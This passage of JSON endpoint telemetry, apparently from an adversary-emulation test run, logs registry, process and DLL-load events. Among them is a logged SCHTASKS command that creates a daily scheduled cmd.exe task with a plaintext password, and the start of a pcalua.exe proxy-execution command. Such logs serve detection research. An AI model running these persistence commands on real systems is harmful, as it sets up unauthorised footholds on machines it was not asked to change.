"ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573938700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573938700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573938700016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883573968550000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883573968550000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Plain\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_value": "{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\spawn\\Index", - "registry_value": "Index", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Hash", - "registry_value": "Hash", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Schema", - "registry_value": "Schema", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Date", - "registry_value": "Date", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Author", - "registry_value": "Author", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\URI", - "registry_value": "URI", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Actions", - "registry_value": "Actions", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "registry", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94D0AB17-9A4C-49A1-B266-A6341A595083}\\Triggers", - "registry_value": "Triggers", - "timestamp": 131883573970580000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}" - }, - { - "event_type": "process", - "pid": 6308, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "terminate", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" - }, - { - "event_type": "process", - "pid": 1776, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC04-5C05-0000-001048EB5601}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6840, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573970860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970730000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573970890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "event_type": "process", - "pid": 6840, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573970890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-00104B0C5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7172, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "command_line": "SCHTASKS /Create /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \" Atomic \"task /TR C:\\windows\\system32\\cmd.exe /SC daily /ST 20:10", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2812, - "ppid": 7172, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "create", - "timestamp": 131883573971590000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", - "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010AD105701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "schtasks.exe", - "image_path": "C:\\Windows\\System32\\schtasks.exe", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971509984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "taskschd.dll", - "image_path": "C:\\Windows\\System32\\taskschd.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "registry", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\WINDOWS\\system32\\schtasks.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "msv1_0.dll", - "image_path": "C:\\Windows\\System32\\msv1_0.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "NtlmShared.dll", - "image_path": "C:\\Windows\\System32\\NtlmShared.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971820000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "image_load", - "image_name": "cryptdll.dll", - "image_path": "C:\\Windows\\System32\\cryptdll.dll", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "process", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "subtype": "terminate", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}" - }, - { - "event_type": "file", - "file_name": "SCHTASKS.EXE-2DE769BF.pf", - "file_path": "C:\\Windows\\Prefetch\\SCHTASKS.EXE-2DE769BF.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 7172, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010AD105701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2828, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573972110000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573971980000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573972140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "event_type": "process", - "pid": 2828, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573972140000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a 